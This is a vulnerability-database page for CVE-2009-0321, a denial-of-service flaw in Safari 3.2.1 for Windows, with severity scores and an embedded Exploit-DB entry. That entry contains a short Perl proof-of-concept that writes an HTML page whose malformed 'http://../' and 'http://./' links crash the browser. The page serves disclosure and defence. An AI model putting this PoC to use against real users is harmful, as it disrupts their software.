CVE-2009-0321 : Detail

CVE-2009-0321

A01-Broken Access Control
0.73%V3
Network
2009-01-28
17h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Apple Safari 3.2.1 (aka AppVer 3.525.27.1) on Windows allows remote attackers to cause a denial of service (infinite loop or access violation) via a link to an http URI in which the authority (aka hostname) portion is either a (1) . (dot) or (2) .. (dot dot) sequence.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-59 Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 32761

Publication date : 2009-01-26 23h00 +00:00
Author : Lostmon
EDB Verified : Yes

source: https://www.securityfocus.com/bid/33481/info Apple Safari is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Apple Safari 3.2.1 for Windows is vulnerable; other versions may also be affected. # !/usr/bin/perl # Safari_httpDoSPoc.pl # Safari for Windows 3.2.1 Remote http: uri handler DoS # Lostmon [[email protected] ] #[http://lostmon.blogspot.com] $archivo = $ARGV[0]; if(!defined($archivo)) { print "Uso: $0 <archivo.html>\n"; } $cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title> <body>" . "\n"; $codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>([email protected]) http://lostmon.blogspot.com</h3> <P>This PoC is a malformed http URI, this causes that safari for windows<br> turn inestable and unresponsive.<br> Click THIS link.=></p><a href=\"http://../\">Safari Die()</a> or this other =><a href=\"http://./\">Safari Die()</a> "; $piepag = "</body></html>"; $datos = $cabecera . $codigo . $piepag; open(FILE, '>' . $archivo); print FILE $datos; close(FILE); exit;

Products Mentioned

Configuraton 0

Apple>>Safari >> Version 3.2.1

Microsoft>>Windows >> Version *

References

http://www.securityfocus.com/bid/33481
Tags : vdb-entry, x_refsource_BID